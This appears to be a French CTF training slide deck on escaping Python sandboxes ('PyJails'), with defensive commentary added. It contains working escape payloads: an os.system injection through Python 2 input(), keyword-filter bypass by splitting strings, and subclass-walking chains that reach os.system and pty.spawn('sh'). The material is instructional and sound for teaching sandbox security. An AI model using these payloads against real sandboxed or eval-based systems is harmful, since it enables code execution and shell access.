PyJails
Qu'est-ce qu'une PyJail ?
Sandbox Python
REPL (Read Eval Print Loop)
Objectif :
- Trouver le flag
- Obtenir un shell
- Quitter la jail
Rappels
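class RootMe:
    """Minimal player profile used to recap Python classes.

    Stores a pseudonym and a running point total. Each method illustrates one
    building block: constructor, getter, mutator and display.
    """

    def __init__(self, pseudo='Null'):
        """Create a profile for *pseudo*; the score starts at 0."""
        self.point = 0
        self.pseudo = pseudo

    def _get_pseudo(self):
        """Return the stored pseudonym.

        The leading underscore is a naming convention only: Python does not
        prevent callers outside the class from invoking this method.
        """
        return self.pseudo

    def flag(self, points):
        """Add *points* to the running total."""
        self.point += points

    def flex(self):
        """Print the greeting line with the pseudonym and the current score."""
        print(f'Salutation {self.pseudo} ! Tu possède {self.point} points, le boss 😎 !')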
# Build one profile and exercise each method. Lines starting with ">>" are the
# output printed by the statement just above them.
Driss = RootMe('Driss')
# _get_pseudo() is called from outside the class here: the leading underscore
# does not restrict access.
print(f'Pseudo : {Driss._get_pseudo()}')
>> Pseudo : Driss
Driss.flex()
>> Salutation Driss ! Tu possède 0 points, le boss 😎 !
# flag(1) adds one point; the next flex() call prints the updated total.
Driss.flag(1)
Driss.flex()
>> Salutation Driss ! Tu possède 1 points, le boss 😎 !
Constructeur
Getter
Méthode
Affichage
POO - Programmation Orientée Objet
Rappels
Tout est objet
import random
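# Start from the list of classes that inherit directly from `object`, reached
# through attribute access on an empty tuple.
# NOTE: this variable shadows the builtin `object` for the rest of the script.
object = ().__class__.__base__.__subclasses__()
# Deliberately endless (stop it with Ctrl+C). Each pass replaces the current
# value with the *name* of one of its attributes, picked at random, and prints
# it. The name is a str, so from the second pass on the picks come from
# dir(str), which is why the output below is mostly string method names.
while True:
    names = dir(object)
    object = random.choice(names)
    print(object)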
>> __repr__
>> join
>> rjust
>> __setattr__
>> swapcase
>> maketrans
>> rjust
>> count
>> lower
>> __len__
>> center
>> translate
>> __getnewargs__
>> isascii
>> rpartition
>> partition
>> zfill
>> maketrans
# int, str and float are classes, and a class is itself an object whose type
# is `type`.
print(type(int))
>> <class 'type'>
print(type(str))
>> <class 'type'>
print(type(float))
>> <class 'type'>
# {} is an instance, so type() returns the class it was built from.
print(type({}))
>> <class 'dict'>
Rappels
Fonction exec
# exec() runs a string as Python statements, with the privileges of the
# calling process. Passing it text that comes from a user is code execution.
exec('print(1)')
>> 1
# Several statements, including an assignment, are accepted in one string.
exec('x = 36; print(x)')
>> 36
Rappels
Fonction eval
# eval() evaluates a single expression. A function call is an expression, so
# this line runs and prints.
eval('print(1)')
>> 1
# An assignment is a statement, not an expression, so eval() rejects the
# string with SyntaxError before any of it runs.
# Accepting only expressions does not make eval() safe: the first example
# shows that a call expression is executed.
eval('x = 36; print(x)')
>> Traceback (most recent call last):
[...]
SyntaxError: invalid syntax
Python Exploit
Python 2 - Input Exploit
# Python 2 only: input() evaluates what the user types as a Python expression
# (it behaves like eval(raw_input())), so this prompt is a code-execution sink
# and not a text field. The second line is what was typed at the '>> ' prompt.
# Mitigation: read text with raw_input() on Python 2. On Python 3, input()
# returns the typed text as a str and does not evaluate it.
print input('>> ')
>> __import__('os').system('ls')
X
X
X
PyJails
PyJail - Level 1/2
PyJails
Listing et bypass
# Enumeration step: list what the jail's namespace still exposes.
# NOTE(review): "||" is presumably slide shorthand for "or"; it is not Python
# syntax, and each call is meant to be tried on its own.
vars() || globals() || locals() # Lists the variables -> depends on the scope
>> {'__builtins__': <...>, '__name__': '__main__', '__file__': '...', '__doc__': None, '__package__': None}
dir() # Lists the attributes
>> ['__builtins__', '__doc__', '__file__', '__name__', '__package__']
# dir(obj) lists the attribute names of obj; here, everything the builtins
# module provides, then the attributes of one of its members.
dir(__builtins__)
>> ['ArithmeticError', 'AssertionError', [...] , 'vars', 'zip']
dir(__builtins__.zip)
>> ['__class__', '__delattr__', [...] , '__str__', '__subclasshook__']
# In the four lines below the name is assembled at run time, with "+" or with
# adjacent string literals, so the complete word never appears in the text
# that was submitted.
# Defensive takeaway: matching forbidden substrings in the input is not a
# containment control.
eval('__im'+'port__')
eval("__im""port__")
print("__impo""rt__")
dir("__impo""rt__")
PyJails
PyJail - Level 3/4/5
PyJails
# Walk from an ordinary literal up to `object`, then back down to the classes
# loaded in the interpreter, using attribute access only.
# Defensive takeaway: removing names from the jail's builtins does not hide
# these classes, because no builtin name is needed to reach them.
print(().__class__)
>> <class 'tuple'>
# __base__ of tuple is the root class `object`.
print(().__class__.__base__)
>> <class 'object'>
# __subclasses__() returns the classes that inherit directly from `object`.
print(().__class__.__base__.__subclasses__())
>> [<class 'type'>, <class 'weakref'>, [...] , <class 'traceback.TracebackException'>]
# The result is a plain list: entries are picked by index. The index of a
# given class depends on what the interpreter has loaded.
print(().__class__.__base__.__subclasses__()[1])
>> <class 'weakref'>
print(dir(().__class__.__base__.__subclasses__()[1]))
['__call__', '__callback__', [...] , '__str__', '__subclasshook__']
Listing
PyJails
Bypass
# dir() returns attribute names as strings.
dir(__builtins__)
>> ['ArithmeticError', 'AssertionError', [...] , 'vars', 'zip']
# getattr() takes the attribute name as a string, so the name can be a
# computed value instead of being written as obj.name in the source.
# Defensive takeaway: a filter that inspects dotted names in the submitted
# text does not cover attribute access done through getattr().
getattr(__builtins__, 'ArithmeticError')
>> <class 'ArithmeticError'>
dir(getattr(__builtins__, 'ArithmeticError'))
>> ['__cause__', '__class__', [...] , 'args', 'with_traceback']
# Calls nest: the result of one getattr() is the object passed to the next.
getattr(getattr(__builtins__, 'ArithmeticError'), 'with_traceback')
>> <method 'with_traceback' of 'BaseException' objects>
PyJails
PyJail - Level 6/7
PyJails
Listing - Informations sur une fonction
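def Function():
    # Sample function for the introspection examples on this page.
    # Documented with comments rather than a docstring: a docstring would be
    # added to the function's constants and change the co_consts output.
    x = 1  # unused on purpose: it is what co_varnames and co_consts report
    print('Hello mister !')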
# A function object carries its compiled code in __code__. The co_* fields
# describe that code and can be read without calling the function.
dir(Function)
>> ['__annotations__', [...] , '__code__', [...] , '__str__', '__subclasshook__']
dir(Function.__code__)
>> [ [...] , 'co_code', 'co_consts', 'co_filename', [...] , 'co_name', 'co_names', [...] , 'co_varnames', [...] ]
# co_name: the name the function was defined with.
print(Function.__code__.co_name)
>> Function
# co_names: the global and builtin names the body refers to.
print(Function.__code__.co_names)
>> ('print',)
# co_filename: path of the source file on the host, which discloses the
# directory layout to whoever can read the attribute.
print(Function.__code__.co_filename)
>> D:\Windows\IDE - Projects\PycharmProjects\test.py
# co_varnames: the local variable names.
print(Function.__code__.co_varnames)
>> ('x',)
# co_consts: the literals used in the body. Defensive takeaway: a secret
# hard-coded in a function (key, password, flag) is readable by any code that
# can reach the function object, even if the function is never called.
# NOTE(review): the function above prints 'Hello mister !', so the string
# constant would be expected to include the trailing " !".
print(Function.__code__.co_consts)
>> (None, 1, 'Hello mister')
PyJails
PyJail - Level 8
PyJails
Classes intéressantes et bypass
<class 'warnings.catch_warnings'> -> catch_warnings()._module.__builtins__['__import__']
<class 'warnings.catch_warnings'> -> catch_warnings().__repr__.im_func.func_globals["linecache"].os.system('XXX')
<class 'site._Printer'> -> site._Printer._Printer__setup.__globals__['os']
<class 'site.pty'> -> pty.spawn("sh")
<class 'sys'> -> sys.module
# Same walk as the `().__class__.__base__.__subclasses__()` listing earlier on
# this page, split into one attribute lookup per statement. Each intermediate
# result is stored under the key 'a' of the builtins mapping and read back by
# subscript.
# Defensive takeaway: the class hierarchy stays reachable from any literal,
# whatever names the exec() namespace exposes. Untrusted code needs isolation
# at the process or OS level, not a trimmed namespace.
_=__builtins__ # Exec jail
_['a']=().__class__
_['a']=_['a'].__base__
_['a']=_['a'].__subclasses__
_['a']()
PyJails
PyJail - Level 9/10
Reversing
Bytecode - Reversing
Python - Reverse 1/2
PyJails
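Que faut-il retenir ?
- Filtrer des mots-clés ou retirer des builtins ne constitue pas une frontière de sécurité : l'introspection (__class__, __subclasses__, getattr, __code__) permet de retrouver ce qui a été masqué.
- eval(), exec() et input() en Python 2 exécutent du code avec les droits du processus : ne jamais leur passer une entrée non fiable.
- Pour exécuter du code non fiable, isoler au niveau du système (processus séparé, conteneur, privilèges minimaux) plutôt que dans l'interpréteur.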
The end
Rhackgondins team ❤
PyJails
By Kévin (Mizu)
PyJails
- 289